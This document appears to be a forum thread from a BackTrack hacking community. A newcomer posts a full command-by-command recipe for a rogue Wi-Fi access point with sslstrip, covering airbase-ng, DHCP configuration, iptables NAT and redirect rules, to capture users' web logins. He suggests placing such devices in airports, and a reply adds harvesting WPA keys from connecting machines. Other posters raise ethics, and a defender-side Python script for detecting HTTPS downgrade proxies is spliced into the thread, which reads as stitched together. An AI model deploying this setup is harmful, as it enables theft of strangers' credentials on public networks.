I've read so much on airbase and sslstrip it's not even funny, yet not once have I seen anyone combine the two. That seemed rather odd to me, as it was the first thing I thought about when I found out about sslstrip. "I'm a total n00b."
I did this a few weeks ago and it does work, but I must say that even without sslstrip running, the Alfa card is crap for this, as you can't select the MTU and connecting to the net is agonizingly slow. After a little digging I found out that it's because the packet size is enlarged when passed through the tap, and it gets fragmented because it's too large.
Anyway, this is how you do it.
Start airbase:
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airbase-ng -e APCONNECT wlan0

Start and connect to your AP with the second adapter (I set mine to open auth):
macchanger --mac 00:55:44:33:22:11 wlan1
iwconfig wlan1 ap 00:22:22:22:22:22 essid myapname channel 5
dhclient wlan1

Bring up the tap and set the IP:
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1500

Put this in your dhcpd.conf file:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 10.0.0.255;
    option routers 10.0.0.1;
    option domain-name-servers 10.0.0.1;
    range 10.0.0.20 10.0.0.50;
}

Start dhcp and set the routing table:
dhcpd3 -cf /root/dhcpd.conf at0
echo 1 > /proc/sys/net/ipv4/ip_forward
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables -t nat -A POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.2.1

Now just start up sslstrip on the tap:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
echo "1" > /proc/sys/net/ipv4/ip_forward
python ./sslstrip.py -p -f -l 8080

All you need to do is connect your client to your AP and browse gmail or whatever.
If sslstrip ever gets ported to C or some other decent language, I think it would be really fun to set it up on the FON router. You could couple two of them together so that one connects to the AP and the other becomes an AP, and all the while sslstrip is running (along with dsniff) capturing everything.
It's honestly scary how effective that attack would be given the right area and a skilled attacker. All an attacker would need to do is get the cert explained in Moxie's video, add an antenna to one or both of the FONs and put it in an airport or business park with a crafty name.
Not too shabby for this noob.
Edit: I just found out, btw, that you can run Python on the FON with the addition of a media card hack.
Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.
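The attack in the post above works because the victim only ever sees plain HTTP: the proxy answers the client's http:// request itself and rewrites every https:// link and form action it relays. The following is an added defender-side example, not code from this thread or from the sslstrip project: a canary check that a network admin can run from an untrusted wireless network. It assumes a hypothetical operator-maintained list of hosts (the `example.test` names are constructed) that are known to answer plain-HTTP requests only with a redirect to https://, and it classifies the response a canary client actually observed.

```python
"""Canary check for an HTTP-to-HTTPS downgrade proxy on a network.

Assumption (hypothetical): the operator keeps a list of hosts known to answer
plain-HTTP requests only with a redirect to https://. A canary client fetches
http://<host>/ from the network under test and hands the observed status,
headers and body to classify_response(). All sample data below is constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed example values: hosts the operator knows to be HTTPS-only.
HTTPS_ONLY_HOSTS = {"mail.example.test", "bank.example.test"}

# Constructed sample body: what a client would receive from a downgrading proxy
# (https:// targets rewritten to http://). Not a captured response.
STRIPPED_PAGE = """<html><body>
<form action="http://mail.example.test/login" method="post">
<input name="user"><input name="pass" type="password"></form>
<a href="http://bank.example.test/">bank</a>
<a href="http://news.example.test/">news</a>
</body></html>"""


class _TargetCollector(HTMLParser):
    """Collect href, form action and src values from an HTML body."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and name in ("href", "action", "src"):
                self.targets.append(value)


def downgraded_targets(body, https_only_hosts=HTTPS_ONLY_HOSTS):
    """Return links and form actions that reach an HTTPS-only host over http://."""
    parser = _TargetCollector()
    parser.feed(body)
    hits = []
    for url in parser.targets:
        parts = urlsplit(url)
        if parts.scheme == "http" and parts.hostname in https_only_hosts:
            hits.append(url)
    return hits


def classify_response(host, status, headers, body, https_only_hosts=HTTPS_ONLY_HOSTS):
    """Classify one plain-HTTP response to http://<host>/ seen by the canary.

    Returns a list of findings; an empty list means the response looks like the
    normal upgrade redirect a legitimate HTTPS-only site sends.
    """
    if host not in https_only_hosts:
        return ["host not in HTTPS-only list; no baseline to compare against"]
    lower = {k.lower(): v for k, v in headers.items()}
    findings = []
    if status == 200:
        findings.append("served content over plain HTTP where a redirect to https:// was expected")
    elif status in (301, 302, 303, 307, 308):
        location = lower.get("location", "")
        if urlsplit(location).scheme == "http":
            findings.append(f"redirect stayed on plain http: {location}")
    for url in downgraded_targets(body, https_only_hosts):
        findings.append(f"downgraded link or form target: {url}")
    return findings


if __name__ == "__main__":
    # Healthy network: the site answers with an upgrade redirect.
    print(classify_response("mail.example.test", 301,
                            {"Location": "https://mail.example.test/"}, ""))
    # Downgrading proxy in the path: login form delivered over plain HTTP.
    for finding in classify_response("mail.example.test", 200,
                                     {"Content-Type": "text/html"}, STRIPPED_PAGE):
        print("FINDING:", finding)
```

The check deliberately does not look for a Strict-Transport-Security header on the plain-HTTP response, because browsers ignore that header unless it arrives over TLS (RFC 6797); the real mitigation is that a browser with HSTS (ideally preloaded) for the host never issues the http:// request in the first place, so a downgrading proxy gets nothing to rewrite.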
Good stuff Vvplalin!
Have you been able to get airbase-ng to work in "-P" mode, i.e. airbase-ng -P -C 30? A really devastating blow would be to see this working with harvester.rb and wkv.exe. This will extract the network key off all machines that connect. The idea being that you don't have to crack a WPA key. It will just be grabbed from every computer that connects to airbase. Do this with airbase in -P mode... wow! Just make sure it is only your machines that connect. Otherwise this could redefine the concept of "wardriving" to an illegal activity. I have started porting SSLstrip to C. I am not the best coder on earth, so it can take a while.
onryo
Let me explain officer, I am not a hacker. I am a security tester of sorts!
I am not for one second suggesting anyone do this at all. I have never once done anything illegal and actually look down on those that do.
For the last month or so I have taken on the mindset of an attacker, and it has been great fun. While doing this I came up with that idea and I thought I would share, as I really have no one else to tell, and if not here it would stay locked in my head forever.
If you would like me to delete it I will, but it is a serious threat and I think people should be aware of it.
Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.
Sorry maybe I just got it wrong when I read it early that morning.
Nobody is perfect, I am making mistakes too and I apologize for it.
Wasn't meant as an insult at all, but a well meant hint anyway.
Thanks for pointing it out again.
Tiocfaidh ár lá
It should be obvious to you (and I know it is) that if someone here thinks you are doing or attempting to do something illegal and/or unethical, you will get called on it.
'Nuff said. On the other hand, full disclosure, as was just mentioned in another thread, is important. If it helps make a product or application more secure then I (and others) are all for it, but there is a caveat with that. It must be done appropriately.
Example: finding a zero day and then posting it here before contact with the manufacturer. That would be a big no-no. It's alright that you post your ideas (I don't think anyone is against that). If there is something that you may think is questionable, an easy thing to do would be to PM the idea(s) to someone with more experience or a mod. This can help you to ensure that you are on the "up & up".
As for the deletion part, it is kind of late to do so, but if a mod sees it and thinks that it is not appropriate then I am sure they will take care of it.
Cheers
To be successful here you should read all of the following.
Forum Rules
Forum FAQ
If you are new to Back|Track
Back|Track Wiki
Failure to do so will probably get your threads deleted or worse.
It's reworded a little bit, as I think the last few lines were the major problem.
I'm all for full disclosure; however, that's not even in my ballpark yet, being how new I am. My ideas are mostly just based on the little things I know and, for whatever reason, people not connecting the dots.
That's why I'm so eager to learn, because I honestly think given enough "training" I can become a serious asset to the security community.
lol, anyone want to offer me a job... I'll even work for minimum wage!
Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.